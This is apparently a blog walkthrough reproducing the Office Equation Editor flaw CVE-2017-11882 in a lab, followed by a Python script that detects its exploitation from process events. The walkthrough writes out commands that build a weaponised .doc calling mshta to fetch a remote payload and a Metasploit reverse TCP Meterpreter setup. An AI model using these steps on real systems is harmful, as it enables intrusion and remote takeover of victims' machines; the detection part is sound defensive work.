Office Remote Code Execution Vulnerability (CVE-2017-11882) Reproduction

1. Vulnerability principle

CVE-2017-11882, the "Microsoft Office Memory Corruption Vulnerability", is a remote code execution vulnerability caused by a stack buffer overflow. Because the affected component fails to handle objects in memory properly, an attacker can run arbitrary code in the context of the current user.

The vulnerability is caused by a buffer overflow in the EQNEDT32.EXE component (the Equation Editor). When a victim opens an Office document, the vulnerability may be triggered, so the potential harm is great. The root cause is that when the EQNEDT32.EXE process reads OLE data containing MathType formula data, the responsible function allocates 0x24 bytes for the Font Name field but does not verify the length of the Font Name data before copying it; if the data exceeds that size, the stack buffer overflows.

Affected versions of Office that have not been updated:

  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016
  • Microsoft Office 365

Vulnerability environment:

Attack machine: Kali (10.10.0.11)
Tool: Metasploit

Target machine: Windows 2008 (10.10.0.9)
Tools: Office, FTP server

2. View the exploit file on the Kali platform

The payload file (a .doc file) prepared for the attack:

This file is generated by the CVE-2017-11882.py attack script from GitHub:

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o payload-cale.doc


When opened, this document displays its Office content and at the same time pops up the Calculator program. This experiment uses the document to verify whether the target machine has the Office remote code execution vulnerability (CVE-2017-11882).


3. Log in to the target machine and start the FTP server

Start the FTP server by clicking the green button on the far left:


The following changes can be seen: the FTP server starts and "FTP service online" is displayed. The FTP root directory is the desktop of the target machine.


4. Log in to Kali and use the FTP server to upload the payload-cale.doc file

Switch to the root account in the Kali terminal, then use the ftp tool to connect to the target machine's service:


After logging in to FTP successfully, upload payload-cale.doc to the Windows 2008 target machine with the command:

put /home/college/CVE-2017-11882-payload/payload-cale.doc /payload-cale.doc



5. Log in to the target machine, open the doc file, and verify that the vulnerability exists


6. Log in to the Kali platform and run the command to generate a doc document containing the attack code

python CVE-2017-11882.py -c "mshta http://10.10.0.11:8080/payload" -o payloadattack.doc


Use the FTP service to upload the file to the target machine:



7. Start and configure Metasploit on the Kali platform

Start it:

msfconsole

Search for the CVE-2017-11882 module:

search CVE-2017-11882

Load the exploit module, then set the payload and the other parameters:

use exploit/windows/smb/CVE-2017-11882

Set the payload to a reverse TCP Meterpreter:

set payload windows/meterpreter/reverse_tcp


Set the local machine address:

set lhost 10.10.0.11

Set the URI path:

set URIPATH payload

After the payload is set and the exploit is started, msf listens on port 8080 of the local machine; when the target machine requests 10.10.0.11:8080/payload, a reverse TCP session connects back to port 4444 on the Kali machine.

Launch the exploit:

exploit -j



8. Double-click the payloadattack.doc document on the target machine to trigger the vulnerability

On the target machine's desktop you can see the file uploaded by FTP in the previous step; double-click to open it, and the session is established.
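The walkthrough above shows where a defender can look: the overflow runs inside EQNEDT32.EXE, so whatever command the document carries (cmd.exe /c calc.exe in step 2, mshta fetching a URL in step 6) appears as a child process of EQNEDT32.EXE. The following is an added detection example; it is not part of the original post, nor code from the CVE-2017-11882.py script or Metasploit. It runs over constructed process-creation events whose key=value layout and field names (ts, parent, image, cmdline) are assumptions for this example, and flags EQNEDT32.EXE launching a shell or script host, as well as mshta being handed a remote URL.

```python
"""Process-lineage detection for Equation Editor (CVE-2017-11882) abuse.

Constructed events, not real telemetry. The key=value layout and the
field names ts/parent/image/cmdline are assumptions for this example.
"""
import re
from typing import Dict, List, Optional

EQUATION_EDITOR = "eqnedt32.exe"
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Shells and script hosts that EQNEDT32.EXE never needs when rendering a formula.
SUSPICIOUS_CHILDREN = {"cmd.exe", "mshta.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "rundll32.exe", "regsvr32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample events mirroring the lab: Word loads the Equation Editor,
# which then spawns the payload command (step 2: calc via cmd.exe; step 6: mshta).
SAMPLE_EVENTS = [
    'ts=2023-06-26T10:00:01 parent="C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE" '
    'image="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" '
    'cmdline="EQNEDT32.EXE -Embedding"',
    'ts=2023-06-26T10:00:02 parent="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" '
    'image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /c calc.exe"',
    'ts=2023-06-26T10:05:10 parent="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" '
    'image="C:\\Windows\\System32\\mshta.exe" cmdline="mshta http://10.10.0.11:8080/payload"',
    'ts=2023-06-26T10:05:11 parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE" '
    'cmdline="WINWORD.EXE /n payloadattack.doc"',
]

_FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value line; values may be double-quoted to allow spaces."""
    fields = {}
    for m in _FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert dict for a suspicious event, or None if nothing matches."""
    parent = image_name(event.get("parent", ""))
    child = image_name(event.get("image", ""))
    cmdline = event.get("cmdline", "")
    reasons: List[str] = []
    severity = None

    # Office launching the Equation Editor is normal for documents with real
    # formulas, so record it as context only.
    if parent in OFFICE_APPS and child == EQUATION_EDITOR:
        reasons.append("office-launched-equation-editor")
        severity = "info"

    # The Equation Editor has no reason to start any child process at all;
    # a shell or script host is the clearest sign the overflow was exploited.
    if parent == EQUATION_EDITOR and child:
        if child in SUSPICIOUS_CHILDREN:
            reasons.append(f"equation-editor-spawned-{child}")
        else:
            reasons.append("equation-editor-spawned-unexpected-child")
        severity = "high"

    # mshta pulling a remote URL is the stager pattern from step 6.
    if child == "mshta.exe" and URL_RE.search(cmdline):
        reasons.append("mshta-remote-url")
        severity = "high"

    if not reasons:
        return None
    return {"ts": event.get("ts", "?"), "child": child,
            "severity": severity, "reasons": reasons}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Classify every event line and return the alerts in input order."""
    alerts = []
    for line in lines:
        alert = classify(parse_event(line))
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f'{a["ts"]} [{a["severity"]}] {a["child"]}: {", ".join(a["reasons"])}')
```

Run against the constructed events, the first alert is informational (Word loading EQNEDT32.EXE), while the cmd.exe and mshta children of EQNEDT32.EXE are reported as high severity; the explorer.exe to WINWORD.EXE event is ignored. In a real deployment the parent/child rule is the one to alert on, since the Equation Editor normally never creates child processes, and patching or disabling the component removes the condition entirely.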


Source: blog.csdn.net/Gherbirthday0916/article/details/131400424